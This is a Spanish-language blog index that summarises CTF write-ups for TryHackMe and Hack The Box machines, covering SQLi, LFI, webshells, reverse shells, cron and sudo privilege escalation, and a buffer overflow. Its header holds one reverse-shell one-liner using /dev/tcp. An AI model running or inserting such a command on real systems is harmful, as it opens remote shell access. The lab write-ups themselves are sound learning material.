sckull - blog
bash -i >& /dev/tcp/localhost/1337 0>&1
TryHackMe - All in One
· ✍️ sckull
suid ftp cron wordpress wpscan
All in One es una maquina de TryHackMe, una vulnerabilidad SQLi y LFI en WordPress nos permitio obtener credenciales las cuales utilizamos en el panel, seguidamente ejecutamos una shell inversa. Finalmente obtuvimos acceso root mediante bash y un script perteneciente a la lista de crontab.
TryHackMe - All in One
TryHackMe - Chill Hack
· ✍️ sckull
steganography steghide docker sudo privesc ftp
Chill Hack es una maquina de TryHackMe, ejecutamos una shell inversa tras enumerar el sitio web. Obtuvimos acceso al siguiente usuario con un script ejecutado con sudo. Un pequeño reto de esteganografia nos permitio realizar nuevamente movimiento lateral. Finalmente escalamos privilegios utilizando docker.
TryHackMe - Chill Hack
TryHackMe - Startup
· ✍️ sckull
pspy webshell wireshark
Startup es una maquina de TryHackMe utilizamos FTP para subir una webshell para luego obtener una shell. Accedimos con un segundo usuario analizando un archivo PCAP. Finalmente ejecutamos una shell inversa editando un script utilizado por un CronJob.
TryHackMe - Startup
Hack The Box - Blunder
· ✍️ sckull
dirsearch sudo privesc
Blunder es una maquina de HackTheBox, Bludit CMS esta corriendo y su version tiene multiples vulnerabilidades, aprovechamos una de ellas para realizar un ataque de contraseñas utilizando un diccionario generado con Cewl, luego ejecutamos una shell inversa. Realizamos movimiento lateral con contraseñas almacenadas por Bludit. Una vulnerabilidad de sudo nos permitió obtener acceso privilegiado.
Hack The Box - Blunder
Hack The Box - Buff
· ✍️ sckull
chisel dirbuster metasploit msfvenom
Buff es una maquina de HackTheBox con SO Windows, encontramos un RCE en Gym Managmente Software lo que nos dio acceso con el usuario Shaun. Observamos un puerto localmente perteneciente a CloudMe, ejecutamos un reverse tunneling para poder explotar la vulnerabilidad Buffer Overflow y obtener acceso privilegiado.
Hack The Box - Buff